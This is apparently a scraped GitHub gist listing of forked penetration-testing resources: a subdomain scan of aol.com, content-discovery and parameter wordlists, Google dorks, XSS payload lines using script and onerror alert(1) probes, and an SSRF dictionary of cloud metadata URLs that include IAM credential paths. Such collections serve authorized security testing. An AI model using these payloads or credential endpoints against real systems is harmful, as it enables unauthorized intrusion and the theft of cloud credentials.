[ SecHackLabs ~/Projects/Rust/Development/findomain ] [develop]
└─ ▶ time ./target/release/findomain -t aol.com --query-database -i --threads 100
Target ==> aol.com
Searching subdomains in the Findomain database for the target aol.com 🔍
Performing asynchronous subdomains resolution for 70600 subdomains with 100 threads, it will take a while. 🧐
Cardoso cmscardoso
cmscardoso
/ parallel-subdomains-resolv.md
Created
November 20, 2019 17:15
— forked from Edu4rdSHL/parallel-subdomains-resolv.md
cmscardoso
/ content_discovery_nullenc0de.txt
Created
April 24, 2019 13:02
— forked from nullenc0de/content_discovery_nullenc0de.txt
content_discovery_nullenc0de.txt
This file has been truncated, but you can view the full file.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| / | |
| $$$lang-translate.service.js.aspx | |
| $367-Million-Merger-Blocked.html | |
| $defaultnav | |
| ${idfwbonavigation}.xml | |
| $_news.php | |
| $search2 | |
| £º | |
| .0 |
cmscardoso
/ params.txt
Created
April 24, 2019 13:02
— forked from nullenc0de/params.txt
List of parameters for content discovery
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 0 | |
| 1 | |
| 11 | |
| 12 | |
| 13 | |
| 14 | |
| 15 | |
| 16 | |
| 17 | |
| 2 |
cmscardoso
/ unicode-transformations.txt
Created
February 25, 2019 12:18
— forked from JelmerDeHen/unicode-transformations.txt
List of interesting unicode code points, extracted from the uni2ascii man page (https://www.billposer.org/Software/uni2ascii_man.html)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| U+00A2 CENT SIGN -> cent | |
| U+00A3 POUND SIGN -> pound | |
| U+00A5 YEN SIGN -> yen | |
| U+00A9 COPYRIGHT SYMBOL -> (c) | |
| U+00AE REGISTERED SYMBOL -> (R) | |
| U+00BC ONE QUARTER -> 1/4 | |
| U+00BD ONE HALF -> 1/2 | |
| U+00BE THREE QUARTERS -> 3/4 | |
| U+00C6 CAPITAL LETTER ASH -> AE | |
| U+00DF SMALL LETTER SHARP S -> ss |
cmscardoso
/ 666_lines_of_XSS_vectors.html
Created
May 11, 2018 21:40
— forked from JohannesHoppe/666_lines_of_XSS_vectors.html
666 lines of XSS vectors, suitable for attacking an API
copied from http://pastebin.com/48WdZR6L
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <script\x20type="text/javascript">javascript:alert(1);</script> | |
| <script\x3Etype="text/javascript">javascript:alert(1);</script> | |
| <script\x0Dtype="text/javascript">javascript:alert(1);</script> | |
| <script\x09type="text/javascript">javascript:alert(1);</script> | |
| <script\x0Ctype="text/javascript">javascript:alert(1);</script> | |
| <script\x2Ftype="text/javascript">javascript:alert(1);</script> | |
| <script\x0Atype="text/javascript">javascript:alert(1);</script> | |
| '`"><\x3Cscript>javascript:alert(1)</script> | |
| '`"><\x00script>javascript:alert(1)</script> | |
| <img src=1 href=1 onerror="javascript:alert(1)"></img> |
cmscardoso
/ json2csv.py
Created
April 30, 2018 13:04
— forked from carlosefonseca/json2csv.py
Basic conversion of a JSON [{"a":"b",…},{"a":"c",…}] to csv.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| # coding=utf-8 | |
| import json | |
| import sys | |
| import codecs | |
| import csv,codecs,cStringIO | |
| class UTF8Recoder: | |
| def __init__(self, f, encoding): |
cmscardoso
/ google-dorks
Created
April 29, 2018 18:56
— forked from clarketm/google-dorks
Listing of a number of useful Google dorks.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| " _ _ " | |
| " _ /|| . . ||\ _ " | |
| " ( } \||D ' ' ' C||/ { % " | |
| " | /\__,=_[_] ' . . ' [_]_=,__/\ |" | |
| " |_\_ |----| |----| _/_|" | |
| " | |/ | | | | \| |" | |
| " | /_ | | | | _\ |" | |
| It is all fun and games until someone gets hacked! |
cmscardoso
/ cloud_metadata.txt
Created
April 29, 2018 18:42
— forked from jhaddix/cloud_metadata.txt
Cloud Metadata Dictionary useful for SSRF Testing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ## AWS | |
| # from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories | |
| http://169.254.169.254/latest/user-data | |
| http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME] | |
| http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME] | |
| http://169.254.169.254/latest/meta-data/ami-id | |
| http://169.254.169.254/latest/meta-data/reservation-id | |
| http://169.254.169.254/latest/meta-data/hostname | |
| http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key |